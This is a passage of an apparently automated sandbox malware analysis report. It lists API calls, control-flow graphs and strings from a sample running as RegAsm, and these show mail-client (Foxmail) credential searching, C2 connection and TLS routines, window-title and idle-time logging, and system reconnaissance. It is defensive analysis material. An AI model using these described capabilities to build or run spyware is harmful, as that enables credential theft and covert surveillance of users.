                                                                                                                                                                        • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000115C
                                                                                                                                                                        • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000116D
                                                                                                                                                                        • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000117C
                                                                                                                                                                        • Part of subcall function 100010F1: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001193
                                                                                                                                                                        • Part of subcall function 100010F1: FindNextFileW.KERNEL32(00000000,00000010), ref: 100011D0
                                                                                                                                                                        • Part of subcall function 100010F1: FindClose.KERNEL32(00000000), ref: 100011DB
                                                                                                                                                                      • lstrlenW.KERNEL32(?), ref: 100014C5
                                                                                                                                                                      • lstrlenW.KERNEL32(?), ref: 100014E0
                                                                                                                                                                      • lstrlenW.KERNEL32(?,?), ref: 1000150F
                                                                                                                                                                      • lstrcatW.KERNEL32(00000000), ref: 10001521
                                                                                                                                                                      • lstrlenW.KERNEL32(?,?), ref: 10001547
                                                                                                                                                                      • lstrcatW.KERNEL32(00000000), ref: 10001553
                                                                                                                                                                      • lstrlenW.KERNEL32(?,?), ref: 10001579
                                                                                                                                                                      • lstrcatW.KERNEL32(00000000), ref: 10001585
                                                                                                                                                                      • lstrlenW.KERNEL32(?,?), ref: 100015AB
                                                                                                                                                                      • lstrcatW.KERNEL32(00000000), ref: 100015B7
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.643127619.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.643112844.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.643127619.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_10000000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: lstrlen$lstrcat$Find$File$CloseEnvironmentFirstNextVariable
                                                                                                                                                                      • String ID: )$Foxmail$ProgramFiles
                                                                                                                                                                      • API String ID: 672098462-2938083778
                                                                                                                                                                      • Opcode ID: 70009fe3950369d2bec9de66e6564922956a7fdd4521fcb7cc54e78474496dcb
                                                                                                                                                                      • Instruction ID: 44b728d421a24f1832cbc0053e0d9d9aefaca4d51113d01ad6b93c48f87fe4b0
                                                                                                                                                                      • Opcode Fuzzy Hash: 70009fe3950369d2bec9de66e6564922956a7fdd4521fcb7cc54e78474496dcb
                                                                                                                                                                      • Instruction Fuzzy Hash: 4081A475A40358A9EB30D7A0DC86FDE7379EF84740F00059AF608EB191EBB16AC5CB95

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 1286 414dc1-414dfd 1287 414e03-414e18 GetSystemDirectoryA 1286->1287 1288 414f18-414f23 1286->1288 1289 414f0e 1287->1289 1290 414e1e-414e6a call 441a8e call 441ae8 LoadLibraryA 1287->1290 1289->1288 1295 414e81-414ebb call 441a8e call 441ae8 LoadLibraryA 1290->1295 1296 414e6c-414e76 GetProcAddress 1290->1296 1309 414f0a-414f0d 1295->1309 1310 414ebd-414ec7 GetProcAddress 1295->1310 1297 414e78-414e7b FreeLibrary 1296->1297 1298 414e7d-414e7f 1296->1298 1297->1298 1298->1295 1300 414ed2 1298->1300 1302 414ed4-414ee5 GetProcAddress 1300->1302 1304 414ee7-414eeb 1302->1304 1305 414eef-414ef2 FreeLibrary 1302->1305 1304->1302 1307 414eed 1304->1307 1308 414ef4-414ef6 1305->1308 1307->1308 1308->1309 1311 414ef8-414f08 1308->1311 1309->1289 1312 414ec9-414ecc FreeLibrary 1310->1312 1313 414ece-414ed0 1310->1313 1311->1309 1311->1311 1312->1313 1313->1300 1313->1309
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00414E10
                                                                                                                                                                      • LoadLibraryA.KERNEL32(?), ref: 00414E52
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E72
                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000), ref: 00414E79
                                                                                                                                                                      • LoadLibraryA.KERNEL32(?), ref: 00414EB1
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414EC3
                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000), ref: 00414ECA
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 00414ED9
                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000), ref: 00414EF0
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Library$AddressFreeProc$Load$DirectorySystem
                                                                                                                                                                      • String ID: \ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
                                                                                                                                                                      • API String ID: 2490988753-744132762
                                                                                                                                                                      • Opcode ID: bff3b13f7ac9eea3f878ccf145141800db562e87b1258dd51974eed62fb821cf
                                                                                                                                                                      • Instruction ID: 3d65f6a93fba2a0b2eac8854c7d2b2934d6e6a161d7d6dc9994b6ec54a408268
                                                                                                                                                                      • Opcode Fuzzy Hash: bff3b13f7ac9eea3f878ccf145141800db562e87b1258dd51974eed62fb821cf
                                                                                                                                                                      • Instruction Fuzzy Hash: 5E31C4B1905315A7D7209F65CC84DDF76DCAB84754F004A2AF944A3210D738D985CBAE

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      APIs
                                                                                                                                                                      • Sleep.KERNEL32(00001388), ref: 0040A77B
                                                                                                                                                                        • Part of subcall function 0040A6B0: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0040A6E6
                                                                                                                                                                        • Part of subcall function 0040A6B0: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A788), ref: 0040A6F5
                                                                                                                                                                        • Part of subcall function 0040A6B0: Sleep.KERNEL32(00002710,?,?,?,0040A788), ref: 0040A722
                                                                                                                                                                        • Part of subcall function 0040A6B0: CloseHandle.KERNEL32(00000000), ref: 0040A729
                                                                                                                                                                      • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040A7B7
                                                                                                                                                                      • GetFileAttributesW.KERNEL32(00000000), ref: 0040A7C8
                                                                                                                                                                      • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0040A7DF
                                                                                                                                                                      • PathFileExistsW.SHLWAPI(00000000), ref: 0040A859
                                                                                                                                                                        • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C52F
                                                                                                                                                                      • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00466478,?,00000000,00000000,00000000,00000000,00000000), ref: 0040A962
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                                                                                                                                                                      • String ID: 8SG$8SG$pQG$pQG$PG$PG
                                                                                                                                                                      • API String ID: 3795512280-1152054767
                                                                                                                                                                      • Opcode ID: 9258c9cb72664625fd59994fadaa45554d81da2cd969a08f99f121fbef191fed
                                                                                                                                                                      • Instruction ID: 2a79d88b44a8fc0b04dcb000ea34af81e4c48788ca5147296d011aa32960a087
                                                                                                                                                                      • Opcode Fuzzy Hash: 9258c9cb72664625fd59994fadaa45554d81da2cd969a08f99f121fbef191fed
                                                                                                                                                                      • Instruction Fuzzy Hash: B6516E716043015ACB15BB72C866ABE77AA9F80349F00483FF646B71E2DF7C9D09865E

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 1412 4048c8-4048e8 connect 1413 404a1b-404a1f 1412->1413 1414 4048ee-4048f1 1412->1414 1417 404a21-404a2f WSAGetLastError 1413->1417 1418 404a97 1413->1418 1415 404a17-404a19 1414->1415 1416 4048f7-4048fa 1414->1416 1419 404a99-404a9e 1415->1419 1420 404926-404930 call 420cf1 1416->1420 1421 4048fc-404923 call 40531e call 402093 call 41b580 1416->1421 1417->1418 1422 404a31-404a34 1417->1422 1418->1419 1434 404941-40494e call 420f20 1420->1434 1435 404932-40493c 1420->1435 1421->1420 1424 404a71-404a76 1422->1424 1425 404a36-404a6f call 41cb72 call 4052fd call 402093 call 41b580 call 401fd8 1422->1425 1427 404a7b-404a94 call 402093 * 2 call 41b580 1424->1427 1425->1418 1427->1418 1444 404950-404973 call 402093 * 2 call 41b580 1434->1444 1445 404987-404992 call 421ad1 1434->1445 1435->1427 1474 404976-404982 call 420d31 1444->1474 1458 4049c4-4049d1 call 420e97 1445->1458 1459 404994-4049c2 call 402093 * 2 call 41b580 call 421143 1445->1459 1471 4049d3-4049f6 call 402093 * 2 call 41b580 1458->1471 1472 4049f9-404a14 CreateEventW * 2 1458->1472 1459->1474 1471->1472 1472->1415 1474->1418
                                                                                                                                                                      APIs
                                                                                                                                                                      • connect.WS2_32(FFFFFFFF,02234948,00000010), ref: 004048E0
                                                                                                                                                                      • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A00
                                                                                                                                                                      • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A0E
                                                                                                                                                                      • WSAGetLastError.WS2_32 ref: 00404A21
                                                                                                                                                                        • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateEvent$ErrorLastLocalTimeconnect
                                                                                                                                                                      • String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                                                                                                                                                                      • API String ID: 994465650-2151626615
                                                                                                                                                                      • Opcode ID: 824217cee8cd65e2c4566ef3e2df31ee38e4afb75aaed780d8085e8039972954
                                                                                                                                                                      • Instruction ID: 8b7d3ad86a52f8452b0ebae4faff6649d271d562dba2871a89d137605d3bb54b
                                                                                                                                                                      • Opcode Fuzzy Hash: 824217cee8cd65e2c4566ef3e2df31ee38e4afb75aaed780d8085e8039972954
                                                                                                                                                                      • Instruction Fuzzy Hash: CE41E8B57506017BC61877BB890B52E7A56AB81308B50017FEA0256AD3FA7D9C108BEF

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      APIs
                                                                                                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E38
                                                                                                                                                                      • SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E43
                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 00404E4C
                                                                                                                                                                      • closesocket.WS2_32(000000FF), ref: 00404E5A
                                                                                                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E91
                                                                                                                                                                      • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00404EA2
                                                                                                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404EA9
                                                                                                                                                                      • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404EBA
                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 00404EBF
                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 00404EC4
                                                                                                                                                                      • SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404ED1
                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 00404ED6
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CloseEventHandle$ObjectSingleWait$closesocket
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3658366068-0
                                                                                                                                                                      • Opcode ID: 6e2d3047bbcd54dd6fb538b66de187a0499e62ad67d4cfb628094cbec65cae59
                                                                                                                                                                      • Instruction ID: 681aebbacbf541c1c6cd6dfca6fba55586e42b113d9ea1c0d4e3a90daa9851ad
                                                                                                                                                                      • Opcode Fuzzy Hash: 6e2d3047bbcd54dd6fb538b66de187a0499e62ad67d4cfb628094cbec65cae59
                                                                                                                                                                      • Instruction Fuzzy Hash: DE21EA71154B04AFDB216B26DC49B1BBBA1FF40326F104A2DE2E211AF1CB79B851DB58

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      APIs
                                                                                                                                                                      • __Init_thread_footer.LIBCMT ref: 0040AD73
                                                                                                                                                                      • Sleep.KERNEL32(000001F4), ref: 0040AD7E
                                                                                                                                                                      • GetForegroundWindow.USER32 ref: 0040AD84
                                                                                                                                                                      • GetWindowTextLengthW.USER32(00000000), ref: 0040AD8D
                                                                                                                                                                      • GetWindowTextW.USER32(00000000,00000000,00000000,00000001,00000000), ref: 0040ADC1
                                                                                                                                                                      • Sleep.KERNEL32(000003E8), ref: 0040AE8F
                                                                                                                                                                        • Part of subcall function 0040A671: SetEvent.KERNEL32(?,?,?,0040B86A,?,?,?,?,?,00000000), ref: 0040A69D
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                                                                                                                                                                      • String ID: [${ User has been idle for $ minutes }$]
                                                                                                                                                                      • API String ID: 911427763-3954389425
                                                                                                                                                                      • Opcode ID: 67b6da18cae3e8576f7385e0c2c8ebcc1754692b360f15e2fa026ce444ac7b22
                                                                                                                                                                      • Instruction ID: 479ab846abdc3ffa357cf8cfb056c4a9d7a1c57035fbb5610920680a3dc8d5cf
                                                                                                                                                                      • Opcode Fuzzy Hash: 67b6da18cae3e8576f7385e0c2c8ebcc1754692b360f15e2fa026ce444ac7b22
                                                                                                                                                                      • Instruction Fuzzy Hash: 1251E2716043419BD714FB22D856AAE7795AF84308F10093FF986A22E2EF7C9D44C69F

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 1584 40da6f-40da94 call 401f86 1587 40da9a 1584->1587 1588 40dbbe-40dc56 call 401f04 GetLongPathNameW call 40417e * 2 call 40de0c call 402fa5 * 2 call 401f09 * 5 1584->1588 1590 40dae0-40dae7 call 41c048 1587->1590 1591 40daa1-40daa6 1587->1591 1592 40db93-40db98 1587->1592 1593 40dad6-40dadb 1587->1593 1594 40dba9 1587->1594 1595 40db9a-40db9f call 43c11f 1587->1595 1596 40daab-40dab9 call 41b645 call 401f13 1587->1596 1597 40dacc-40dad1 1587->1597 1598 40db8c-40db91 1587->1598 1610 40dae9-40db39 call 40417e call 43c11f call 40417e call 402fa5 call 401f13 call 401f09 * 2 1590->1610 1611 40db3b-40db87 call 40417e call 43c11f call 40417e call 402fa5 call 401f13 call 401f09 * 2 1590->1611 1600 40dbae-40dbb3 call 43c11f 1591->1600 1592->1600 1593->1600 1594->1600 1606 40dba4-40dba7 1595->1606 1619 40dabe 1596->1619 1597->1600 1598->1600 1612 40dbb4-40dbb9 call 409092 1600->1612 1606->1594 1606->1612 1620 40dac2-40dac7 call 401f09 1610->1620 1611->1619 1612->1588 1619->1620 1620->1588
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetLongPathNameW.KERNEL32(00000000,?,00000208,00000000,?,00000030), ref: 0040DBD5
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: LongNamePath
                                                                                                                                                                      • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                                                                                                                                                      • API String ID: 82841172-425784914
                                                                                                                                                                      • Opcode ID: f85e029fdd0af06f03fccea21248521babeaaf2e92215739b0c3fee69db463eb
                                                                                                                                                                      • Instruction ID: db29472287e64cad03ac4489520097095d7cef5d056ecb8d0020da3553efca3c
                                                                                                                                                                      • Opcode Fuzzy Hash: f85e029fdd0af06f03fccea21248521babeaaf2e92215739b0c3fee69db463eb
                                                                                                                                                                      • Instruction Fuzzy Hash: 0A4151715082019AC205F765DC96CAAB7B8AE90758F10053FB146B20E2FFBCAE4DC65B

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 1683 44acc9-44ace2 1684 44ace4-44acf4 call 4467e6 1683->1684 1685 44acf8-44acfd 1683->1685 1684->1685 1692 44acf6 1684->1692 1687 44acff-44ad07 1685->1687 1688 44ad0a-44ad2e MultiByteToWideChar 1685->1688 1687->1688 1690 44ad34-44ad40 1688->1690 1691 44aec1-44aed4 call 43502b 1688->1691 1693 44ad94 1690->1693 1694 44ad42-44ad53 1690->1694 1692->1685 1696 44ad96-44ad98 1693->1696 1697 44ad55-44ad64 call 457210 1694->1697 1698 44ad72-44ad83 call 4461b8 1694->1698 1700 44aeb6 1696->1700 1701 44ad9e-44adb1 MultiByteToWideChar 1696->1701 1697->1700 1711 44ad6a-44ad70 1697->1711 1698->1700 1708 44ad89 1698->1708 1705 44aeb8-44aebf call 435ecd 1700->1705 1701->1700 1704 44adb7-44adc9 call 448c33 1701->1704 1713 44adce-44add2 1704->1713 1705->1691 1712 44ad8f-44ad92 1708->1712 1711->1712 1712->1696 1713->1700 1715 44add8-44addf 1713->1715 1716 44ade1-44ade6 1715->1716 1717 44ae19-44ae25 1715->1717 1716->1705 1720 44adec-44adee 1716->1720 1718 44ae27-44ae38 1717->1718 1719 44ae71 1717->1719 1721 44ae53-44ae64 call 4461b8 1718->1721 1722 44ae3a-44ae49 call 457210 1718->1722 1723 44ae73-44ae75 1719->1723 1720->1700 1724 44adf4-44ae0e call 448c33 1720->1724 1728 44aeaf-44aeb5 call 435ecd 1721->1728 1737 44ae66 1721->1737 1722->1728 1735 44ae4b-44ae51 1722->1735 1727 44ae77-44ae90 call 448c33 1723->1727 1723->1728 1724->1705 1739 44ae14 1724->1739 1727->1728 1741 44ae92-44ae99 1727->1741 1728->1700 1740 44ae6c-44ae6f 1735->1740 1737->1740 1739->1700 1740->1723 1742 44aed5-44aedb 1741->1742 1743 44ae9b-44ae9c 1741->1743 1744 44ae9d-44aead WideCharToMultiByte 1742->1744 1743->1744 1744->1728 1745 44aedd-44aee4 call 435ecd 1744->1745 1745->1705
                                                                                                                                                                      APIs
                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,0042DD92,?,?,?,0044AF1A,00000001,00000001,?), ref: 0044AD23
                                                                                                                                                                      • __alloca_probe_16.LIBCMT ref: 0044AD5B
                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,0042DD92,?,?,?,0044AF1A,00000001,00000001,?), ref: 0044ADA9
                                                                                                                                                                      • __alloca_probe_16.LIBCMT ref: 0044AE40
                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0044AEA3
                                                                                                                                                                      • __freea.LIBCMT ref: 0044AEB0
                                                                                                                                                                        • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                                                                                                                                      • __freea.LIBCMT ref: 0044AEB9
                                                                                                                                                                      • __freea.LIBCMT ref: 0044AEDE
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3864826663-0
                                                                                                                                                                      • Opcode ID: 276b4224ba7534166915209a775ab474993eb6b0505c2e4c67818911aa509b1e
                                                                                                                                                                      • Instruction ID: de232b2c18f644b0009b05ef7aad101f1c584e700cc6948cb3d999d9ae9be8cc
                                                                                                                                                                      • Opcode Fuzzy Hash: 276b4224ba7534166915209a775ab474993eb6b0505c2e4c67818911aa509b1e
                                                                                                                                                                      • Instruction Fuzzy Hash: 41514C72A80206AFFB258F64CC41EBF77A9DB44750F25462EFC14D7240EB38DC60869A
                                                                                                                                                                      APIs
                                                                                                                                                                      • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0041C4C1
                                                                                                                                                                      • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0041C4DE
                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 0041C4EA
                                                                                                                                                                      • WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0041C4FB
                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 0041C508
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: File$CloseHandle$CreatePointerWrite
                                                                                                                                                                      • String ID: xpF
                                                                                                                                                                      • API String ID: 1852769593-354647465
                                                                                                                                                                      • Opcode ID: 03b5af7f289a82a83928ea742180afc1da621273c2f808e1c0dcbcf6c59c1bfa
                                                                                                                                                                      • Instruction ID: 0233a984b642d2e84dd4fc2cab076f06cd7f632185dc4648213adf39284592b7
                                                                                                                                                                      • Opcode Fuzzy Hash: 03b5af7f289a82a83928ea742180afc1da621273c2f808e1c0dcbcf6c59c1bfa
                                                                                                                                                                      • Instruction Fuzzy Hash: 6311E571288215BFE7104A24ACC8EBB739CEB46365F10862BF912D22D0C624DC418639
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 0041C048: GetCurrentProcess.KERNEL32(?,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C059
                                                                                                                                                                        • Part of subcall function 0041C048: IsWow64Process.KERNEL32(00000000,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C060
                                                                                                                                                                        • Part of subcall function 004135E1: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00413605
                                                                                                                                                                        • Part of subcall function 004135E1: RegQueryValueExA.KERNEL32 ref: 00413622
                                                                                                                                                                        • Part of subcall function 004135E1: RegCloseKey.KERNEL32(?), ref: 0041362D
                                                                                                                                                                      • StrToIntA.SHLWAPI(00000000), ref: 0041B3CD
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Process$CloseCurrentOpenQueryValueWow64
                                                                                                                                                                      • String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                                                                                                                                      • API String ID: 782494840-2070987746
                                                                                                                                                                      • Opcode ID: a9c02e874ac761b1a54f69f9c7c0e468dff2f28919116cd580da9d812710a803
                                                                                                                                                                      • Instruction ID: f33cb4008a08c387480eb48f471200dcc92f04aa72c22424ac0a9b44a4c1d04d
                                                                                                                                                                      • Opcode Fuzzy Hash: a9c02e874ac761b1a54f69f9c7c0e468dff2f28919116cd580da9d812710a803
                                                                                                                                                                      • Instruction Fuzzy Hash: 8811C47064014926C704B7658C97EFE76198790344F94413BF806A61D3FB6C598683EE
                                                                                                                                                                      APIs
                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,10006FFD,00000000,?,?,?,10008A72,?,?,00000100), ref: 1000887B
                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,10008A72,?,?,00000100,5EFC4D8B,?,?), ref: 10008901
                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 100089FB
                                                                                                                                                                      • __freea.LIBCMT ref: 10008A08
                                                                                                                                                                        • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                                                                                                                                                                      • __freea.LIBCMT ref: 10008A11
                                                                                                                                                                      • __freea.LIBCMT ref: 10008A36
                                                                                                                                                                      Memory Dump Source
